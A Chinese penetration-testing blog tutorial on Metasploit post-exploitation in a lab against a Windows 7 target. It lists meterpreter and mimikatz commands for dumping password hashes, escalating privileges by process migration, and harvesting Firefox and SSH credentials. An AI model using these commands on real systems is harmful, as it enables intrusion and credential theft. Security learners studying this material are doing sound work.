内网渗透之内网信息收集(三)

已于 2022-09-14 19:53:28 修改
阅读量1k 收藏 6
点赞数 8
分类专栏: # 内网渗透 网络安全 文章标签: 安全 windows
于 2022-07-04 16:17:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/125602600
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

Metasploit内网信息收集

07口令破解

普通用户提权

08other

内网渗透之内网信息收集(四)_不知名白帽的博客-CSDN博客

Metasploit内网信息收集

攻击机 kali 192.168.0.103

靶机 win7 192.168.0.105

07口令破解

use post/windows/gather/hashdump //system权限的meterpreter

set session 1

exploit //结果保存在tmp目录下

use post/windows/gather/smart_hashdump

set session 1

exploit

格式

用户名称:RID:LM-HASH值:NT-HASH值

rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同

hashdump使用的是mimikatz的部分功能

load mimikatz

wdigest、kerberos、msv、ssp、tspkg、livessp

mimikatz_command -h

mimikatz_command -f a:: //查询有哪些模块

mimikatz_command -f samdump::hashes

mimikatz_command -f samdump::bootkey

普通用户提权

getuid

查看用户权限

hashdump

需要管理员的权限

getsystem

只是表面上获取了管理员权限,并没有拥有一些真正的管理员权限

ps

查看进程

getpid

查看当前进程

migrate

进程迁移(把普通用户进程迁移到管理员用户的进程上)

hashdump

08other

确定目标主机是否是虚拟机:

run checkvm

获取目标主机上的软件安装信息:

run post/windows/gather/enum_applications

获取目标主机上最近访问过的文档、链接信息:

run post/windows/gather/dumplinks

查看目标环境信息:

run post/windows/gather/env

查看firefox中存储的账号密码:

run post/windows/gather/firefox_creds

查看ssh账号密码的密文信息、证书信息:

run post/windows/gather/ssh_creds

不知名白帽
关注
专栏目录
内网渗透之域渗透.pdf
08-07
内网渗透和域渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...
内网信息收集(超级全)
yggcwhat
02-09 1399
内网信息收集 文章首发与奇安信攻防社区 https://forum.butian.net/share/236 简介 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,所以信息收集的重要性不容小觑,看得懂并不代表会,不如自己实操一遍,这里将提供一个单域的环境下载地址,进行信息收集。 单域环境 这张图为这次信息收集所搭建的单域内网环境。 工作组与域环境比较 工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要
内网渗透系列:内网信息搜集方法小结
闵行小鱼塘
05-24 1285
记录下内网信息搜集方法
Metasploit 如何使用Exploits(漏洞)
jklbnm12的博客
02-23 679
在Metasploit中选择一个漏洞利用程序将’exploit’和’check’命令添加到msfconsole。 msf > use  exploit/windows/smb/ms09\_050\_smb2\_negotiate\_func\_indexmsf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > help...略...Exploit 命令=======
内网渗透测试之信息收集.pdf
03-17
内网渗透测试的信息收集是渗透测试工作中极为关键的一步,它决定了后续渗透测试的方向和深度。信息收集通常分为手工信息收集和自动化信息收集,通过多种手段来获取目标内网的详细信息,以利于后续的攻击和渗透。 ...
内网渗透思路.pdf
04-22
在进行内网渗透之前,第一步是要充分收集目标服务器的信息。这一步骤至关重要,因为它可以帮助我们了解目标网络的基本结构,从而更有效地定位可能的安全漏洞。 **方法与工具:** - **F-NAScan**:这是一个开源工具...
【渗透资源】 内网渗透指南
03-03
在进行内网渗透之前,信息收集是至关重要的一个步骤。信息收集分为多个阶段,首先是主机发现,目标是识别内网中存活的主机IP地址。这可以通过运行端口扫描和漏洞扫描工具来实现,比如使用nmap、masscan等工具来获取...
信息收集内网结构的探测.pdf
04-08
### 信息收集内网结构的探测 在网络安全领域中,对于内部网络的了解与掌握是进行安全评估或攻击渗透的基础工作。本文将基于提供的部分文件内容,深入探讨如何有效地进行内网结构探测,并通过实际案例解析关键技术...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 316
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 248
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
Dependency Check:一款针对应用程序依赖组件的安全检测工具
FreeBuf_的博客
09-19 1998
Dependency-Check 是一款软件组合分析 (SCA) 工具,可尝试检测项目依赖项中包含的公开披露的漏洞。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
weixin_45699851的博客
09-25 97
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
前后端分离项目中如何保证 API 安全
Caleb的博客
09-19 1111
在前后端分离的项目中,API 的安全性直接关系到整个系统的安全。HTTPS 加密通信,防止数据被窃取。JWT 身份验证和OAuth 2.0 授权,确保用户身份的合法性。CSRF 防护和,防止恶意请求和暴力破解。参数验证和请求签名,确保数据的完整性和安全性。CORS 策略与日志监控,防止跨域攻击和异常行为。
了解云计算工作负载保护的重要性,确保数据和应用程序安全
m0_74885516的博客
09-25 231
随着威胁的演变和环境的日益复杂,保护云工作负载变得至关重要。在这里了解有效的云计算工作负载保护(CWP)。云计算技术的快速发展使得数据和应用程序的安全性成为一项重要的需求
注册安全分析报告:人民卫生音像
最新发布
Explinks的博客
09-25 315
人民卫生音像出版社,作为国家卫生健康委员会、中宣部、财政部、教育部等国家部委的领导下的官方企业, 采用的是通俗的滑动验证产品, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
运维工程师面试整理-安全常见安全漏洞及修复
不务正业的猿
09-19 505
暴露在互联网的服务和端口可能会成为攻击者的目标,例如开放的SSH、FTP、Telnet等。:攻击者通过注入恶意脚本,使其在其他用户的浏览器中执行,从而窃取用户信息或劫持用户会话。:通过插入恶意SQL代码,攻击者可以操纵应用程序的数据库查询,执行未授权的数据库操作。:展示你对新兴安全威胁和防护技术的了解和学习能力,如零信任架构、基于AI的安全分析等。在不同的服务器或沙盒环境中处理和存储上传的文件,避免在Web根目录下保存可执行文件。采用安全框架和标准(如OWASP、NIST),确保系统和应用的安全合规性。
使用电脑当服务器,来组建局域网是否安全
KookeeyLena5的博客
09-25 106
使用电脑作为服务器来组建局域网(LAN)可以是一个经济实惠的解决方案,但其安全性取决于多个因素。
【OSS安全最佳实践】降低因账号密码泄露带来的未授权访问风险
segwy的博客
09-21 1152
如果因个人或者企业账号密码泄露引发了未经授权的访问,可能会出现非法用户对OSS资源进行违法操作,或者合法用户以未授权的方式对OSS资源进行各类操作,这将给数据安全带来极大的威胁。为此,OSS提供了在实施数据安全保护时需要考虑的多种安全最佳实践。以下最佳实践遵循一般准则,并不等同完整的安全解决方案。这些最佳实践可能不适合您的环境或不满足您的环境要求,仅建议将其视为参考因素。请您在日常使用中提高数据安全意识并时刻做好内容安全防范措施。
网站设计中安全方面都需要有哪些考虑
2301_80154636的博客
09-22 411
总的来说,通过综合考虑这些安全措施,可以大大提高网站的安全性,保护用户数据不受侵害,同时维护网站的信誉和业务连续性。网站设计中的安全性是一个多方面的问题,需要从多个角度进行考虑和实施。
内网结构探测:域内信息收集关键步骤
本文主要探讨了域内网中的信息收集策略,特别是关于内网结构探测的重要性。作者bugcx在其博客中分享了如何在入侵内网时进行初步的信息搜集工作,以便了解网络布局和寻找潜在漏洞。首先,通过对网络设备如子网掩码、...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值